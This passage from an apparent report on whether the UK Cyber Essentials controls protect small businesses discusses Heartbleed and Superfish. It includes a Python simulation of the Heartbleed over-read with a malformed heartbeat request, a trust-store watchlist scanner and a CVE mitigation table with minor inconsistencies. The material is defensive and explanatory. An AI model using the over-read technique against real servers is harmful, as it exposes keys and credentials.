Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use, and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
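To make the "buffer over-read" concrete, the following Python simulation (written for this edit; it is not OpenSSL code and not part of the report) models a TLS heartbeat record as type, two-byte payload length, payload and padding, and contrasts the pre-1.0.1g behaviour of trusting the declared length with the 1.0.1g check, which discards any record whose declared payload plus header and minimum padding exceeds the bytes actually received. The "adjacent memory" contents and the records are constructed stand-ins.

```python
"""Heartbeat record handling: the missing bounds check behind CVE-2014-0160
and the corrected check. Python simulation written for this edit; the
'process memory' and records below are constructed."""
import struct

HB_REQUEST = 1
HB_RESPONSE = 2
PADDING = 16          # minimum padding length required by RFC 6520

# Constructed stand-in for whatever happened to sit after the record in the
# heap of the TLS process.
ADJACENT_MEMORY = (b"\x00" * 8
                   + b"session-cookie=abc123; "
                   + b"-----BEGIN RSA PRIVATE KEY-----...")


def build_heartbeat(payload: bytes, declared_length=None) -> bytes:
    """type(1) | payload_length(2) | payload | padding. A benign peer sets
    declared_length == len(payload); an attacker declares far more."""
    if declared_length is None:
        declared_length = len(payload)
    return struct.pack("!BH", HB_REQUEST, declared_length) + payload + b"\x00" * PADDING


def respond_vulnerable(record: bytes, adjacent: bytes = ADJACENT_MEMORY) -> bytes:
    """Pre-1.0.1g behaviour: trust the declared length and copy that many
    bytes from the payload onward, running past the record into whatever
    memory follows it."""
    _, payload_length = struct.unpack("!BH", record[:3])
    memory = record[3:] + adjacent        # the record followed by other heap data
    return struct.pack("!BH", HB_RESPONSE, payload_length) + memory[:payload_length]


def respond_fixed(record: bytes):
    """1.0.1g check: silently discard the record if the declared payload plus
    the 3-byte header and minimum padding exceed the record actually received."""
    if len(record) < 1 + 2 + PADDING:
        return None
    _, payload_length = struct.unpack("!BH", record[:3])
    if 1 + 2 + payload_length + PADDING > len(record):
        return None
    payload = record[3:3 + payload_length]
    return struct.pack("!BH", HB_RESPONSE, payload_length) + payload


def leaked_bytes(response: bytes) -> bytes:
    """Payload of a heartbeat response, i.e. what the peer got back."""
    return response[3:]


if __name__ == "__main__":
    benign = build_heartbeat(b"ping")
    print("benign, fixed:", leaked_bytes(respond_fixed(benign)))
    evil = build_heartbeat(b"A", declared_length=0xFFFF)   # 1 real byte, 65535 declared
    print("evil, vulnerable:", leaked_bytes(respond_vulnerable(evil)))
    print("evil, fixed:", respond_fixed(evil))
```

The simulation is bounded by the constructed buffer, so the over-read returns only what was placed after the record here; the real bug read up to 64 KiB per request and could be repeated indefinitely, with nothing logged on the server side.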

"Superfish"

"The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products."

CVE-2015-2077 [14]

This vulnerability is particularly interesting, as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security, as yet undiscovered, in both Lenovo's and other manufacturers' equipment.

The vector is through the Superfish software, which breaks the chain of trust for SSL certificates by installing its own self-signed root CA certificate into the list of trusted certificates on the host machine. Because every installation shares the same CA private key, an attacker who extracts that key from any other machine running Superfish can sign certificates for arbitrary servers, and the target machine will accept them, giving the attacker access to any SSL-secured connection from the target.

Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice. Note that uninstalling the Superfish application on its own leaves the root certificate in place; the certificate must also be removed from the Windows certificate store and from any browser with its own trust store (Firefox, for example).
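Because the damage here lives in the trust store rather than in an installed binary, the check a practitioner wants is an enumeration of trusted roots against a watchlist. The Python below is an added example for this edit (not from the report or from Lenovo): it flattens the subject structure that Python's ssl module returns for loaded CA certificates and flags any root whose subject names Superfish or Komodia. The store entries used for the demonstration are constructed to mirror that structure; scan_system_roots() reads the real store (the Windows system store on Windows, the OpenSSL bundle elsewhere) but does not cover browsers that keep their own store.

```python
"""Trusted-root watchlist scan for the Superfish case. Example code written
for this edit; the SAMPLE_STORE entries are constructed to mirror the
dict shape returned by ssl.SSLContext.get_ca_certs()."""
import ssl

# Names that have no business appearing among an SME's trusted roots. "Superfish"
# and "Komodia" are the names given in CVE-2015-2077.
WATCHLIST = ("superfish", "komodia")


def subject_fields(cert: dict) -> dict:
    """Flatten ((('countryName','US'),), (('commonName','X'),)) into a dict."""
    fields = {}
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            fields[key] = value
    return fields


def suspicious_roots(certs, watchlist=WATCHLIST):
    """Return (commonName, organizationName) for every certificate whose
    subject contains a watchlisted name, case-insensitively."""
    hits = []
    for cert in certs:
        fields = subject_fields(cert)
        haystack = " ".join(str(v) for v in fields.values()).lower()
        if any(word in haystack for word in watchlist):
            hits.append((fields.get("commonName", ""), fields.get("organizationName", "")))
    return hits


def scan_system_roots(watchlist=WATCHLIST):
    """Load the platform's default trust store and scan it."""
    ctx = ssl.create_default_context()
    ctx.load_default_certs()
    return suspicious_roots(ctx.get_ca_certs(), watchlist)


# Constructed sample store: one ordinary root and one Superfish-style root.
SAMPLE_STORE = [
    {"subject": ((("countryName", "US"),),
                 (("organizationName", "Example Trust Services"),),
                 (("commonName", "Example Root CA"),)),
     "serialNumber": "01"},
    {"subject": ((("countryName", "US"),),
                 (("stateOrProvinceName", "CA"),),
                 (("localityName", "SF"),),
                 (("organizationName", "Superfish, Inc."),),
                 (("commonName", "Superfish, Inc."),)),
     "serialNumber": "02"},
]

if __name__ == "__main__":
    print("sample store:", suspicious_roots(SAMPLE_STORE))
    print("system store:", scan_system_roots())
```

A name match is a triage signal, not proof: a thorough check compares fingerprints of every root against a known-good baseline for the build image, which also catches a rogue root that uses an innocuous name.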

Threat Analysis

ShellShock. Without Cyber Essentials in place, SME 1 and 2 would be at risk from Shellshock, as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed. The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines. Patching alone does not undo a disclosure that may already have happened, and a successful read leaves no trace in server logs, so private keys and credentials on servers that were exposed while vulnerable should be rotated after the update.

SuperFish. All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the tool, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue. The anti-malware control also played a part in practice: Windows Defender and several third-party anti-virus products added detection that removed Superfish and its certificate shortly after the disclosure.


Conclusions

The Cyber Essentials controls have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight could not be resolved by the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items be composed for public reference.

Scope. It is important to consider that the scope of this study covers only internet-based commodity-level attacks, and although the Cyber Essentials controls perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts, but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials scheme well, delivering additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and systems monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations, additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note is to be made regarding the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding their security practice to a high level of scrutiny and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (around 600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials controls, patch management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use among SMEs. The controls most used currently could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, by contrast, is not necessarily understood by individuals as a tool that greatly improves cyber security.

Anti-malware was useful in mitigating the fewest vulnerabilities (10%). It is, however, important to note that anti-malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence, and as such is vital to an organisation's cyber-safety.

Recommendations

To further improve cyber security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attack mentioned above, which were not within the scope of this report.


References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK and Department for Business, Innovation & Skills. Cyber-security Information Sharing Partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list/, March 2015.

[6] CVE.Mitre.org. Terminology. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber Essentials scheme: overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure and Department for Business, Innovation & Skills. Common cyber attacks: reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North West cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-cluster, 2015.

[10] HM Government. Cyber Essentials scheme: assurance framework. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 (aka Heartbleed). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 (aka Shellshock). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 (aka Superfish). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


Cyber Controls Applicability

CVE | SME1 SME2 SME3 SME4 Idealised | No CE | With CE
CVE-2013-0008 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y y y n y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y n n n n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n n n n n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y n n n n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n n y n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y y y y y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y y y y n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y y y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y n n n n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y y y y n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y n y y n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y y y y n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y n y y n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y y y y n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y y y y n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n n y n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n n n n n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n y n n y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y n y n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y n n n n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n n n n n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y y y y n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't install)
CVE-2013-3194 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y n y y y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y n y y y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n n n n n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y y y n n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y y y y y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration - no JS
CVE-2013-3897 | y n y y n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y y n y n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n n n n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y n y y n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n n n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n n n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n n n n m | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y y y y y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie deletion)
CVE-2013-6188 | y y n n n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n y y n n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y y y y y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n n n n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n n y n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y n n y n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n n n y n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y n n y y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y n y n n | Not Mitigated | Mitigated - Boundary Firewalls include Anti-DOS
CVE-2014-0035 | n n y n n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n n n n n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y y y n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y y y y y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y y y n y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n n y n y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y n y y n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y n n y n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y y y y n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y y y n y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y n n n n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y y y y y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y y y y y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y y y y y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n n n n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n n n n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y y y y y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y y y y y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y y y y y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y y y y y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y y y y y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y y y y y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n y y y y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y y y y y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y n n n y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y n n n n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y n y y y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y y y y y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y y y y y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y y y y y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n n n n n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n n n n n | Not Mitigated | Mitigated - Firewall, Anti-DOS
CVE-2014-2109 | n n n n n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n y y n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n n y n n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n y n n n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n n n n n | Not Mitigated | Mitigated - Firewall, Anti-DOS
CVE-2014-2768 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y n y y n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n n n y n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n n n n n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n n y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y n y n y | Not Mitigated | Partially Mitigated - Patch Management
